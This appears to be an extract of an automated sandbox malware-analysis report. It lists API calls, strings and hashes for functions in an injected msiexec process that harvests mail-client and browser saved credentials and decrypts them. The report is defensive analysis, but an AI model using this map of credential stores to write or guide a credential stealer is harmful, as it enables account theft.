                                                                                                      • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                      • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                      • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                      • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                      APIs
                                                                                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 4165544737-0
                                                                                                      • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                      • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                      • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                      • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                      • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                      • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                      • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                      • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                      • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                      • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                      • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                      • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                      • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                      APIs
                                                                                                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFind
                                                                                                      • String ID:
                                                                                                      • API String ID: 1863332320-0
                                                                                                      • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                      • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                      • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                      • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                      • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                      • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                      • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                      • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                      • API String ID: 2238633743-192783356
                                                                                                      • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                      • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                      • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                      • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                      • API String ID: 3963849919-1658304561
                                                                                                      • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                      • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                      • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                      • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                      • String ID: (yE$(yE$(yE
                                                                                                      • API String ID: 1865533344-362086290
                                                                                                      • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                      • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                      • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                      • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                      • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                      • API String ID: 1714764973-479759155
                                                                                                      • Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                      • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                      • Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                      • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040EBD8
                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                      • memset.MSVCRT ref: 0040EC2B
                                                                                                      • memset.MSVCRT ref: 0040EC47
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                      • memset.MSVCRT ref: 0040ECDD
                                                                                                      • memset.MSVCRT ref: 0040ECF2
                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                      • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                      • memset.MSVCRT ref: 0040EDE1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                      • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                      • API String ID: 3137614212-1455797042
                                                                                                      • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                      • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                      • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                      • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                      • memset.MSVCRT ref: 0040E5B8
                                                                                                      • memset.MSVCRT ref: 0040E5CD
                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                      • memset.MSVCRT ref: 0040E6B5
                                                                                                      • memset.MSVCRT ref: 0040E6CC
                                                                                                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                        • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                      • memset.MSVCRT ref: 0040E736
                                                                                                      • memset.MSVCRT ref: 0040E74F
                                                                                                      • sprintf.MSVCRT ref: 0040E76D
                                                                                                      • sprintf.MSVCRT ref: 0040E788
                                                                                                      • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                      • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                      • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                      • memset.MSVCRT ref: 0040E858
                                                                                                      • sprintf.MSVCRT ref: 0040E873
                                                                                                      • _strcmpi.MSVCRT ref: 0040E889
                                                                                                      • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                      • API String ID: 4171719235-3943159138
                                                                                                      • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                      • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                      • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                      • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                      • GetDC.USER32 ref: 004104E2
                                                                                                      • strlen.MSVCRT ref: 00410522
                                                                                                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                      • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                      • sprintf.MSVCRT ref: 00410640
                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                      • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                      • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                      • API String ID: 1703216249-3046471546
                                                                                                      • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                      • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                      • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                      • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004024F5
                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                      • _mbscpy.MSVCRT(?,00000000,?,?,?,682F7B60,?,00000000), ref: 00402533
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$QueryValuememset
                                                                                                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                      • API String ID: 168965057-606283353
                                                                                                      • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                      • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                      • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                      • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00402869
                                                                                                        • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                      • _mbscpy.MSVCRT(?,?,682F7B60,?,00000000), ref: 004028A3
                                                                                                        • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,682F7B60,?,00000000), ref: 0040297B
                                                                                                        • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                      • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                      • API String ID: 1497257669-167382505
                                                                                                      • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                      • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                      • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                      • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                      APIs
                                                                                                      • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                      • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                      • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                      • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                      • memset.MSVCRT ref: 0040FCFD
                                                                                                      • memset.MSVCRT ref: 0040FD1D
                                                                                                      • memset.MSVCRT ref: 0040FD3B
                                                                                                      • memset.MSVCRT ref: 0040FD54
                                                                                                      • memset.MSVCRT ref: 0040FD72
                                                                                                      • memset.MSVCRT ref: 0040FD8B
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                      • memset.MSVCRT ref: 0040FE45
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                      • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                      • sprintf.MSVCRT ref: 0040FF0F
                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                      • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                      Strings
                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                      • {Unknown}, xrefs: 0040FD02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                      • API String ID: 1428123949-3474136107
                                                                                                      • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                      • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                      • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                      • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
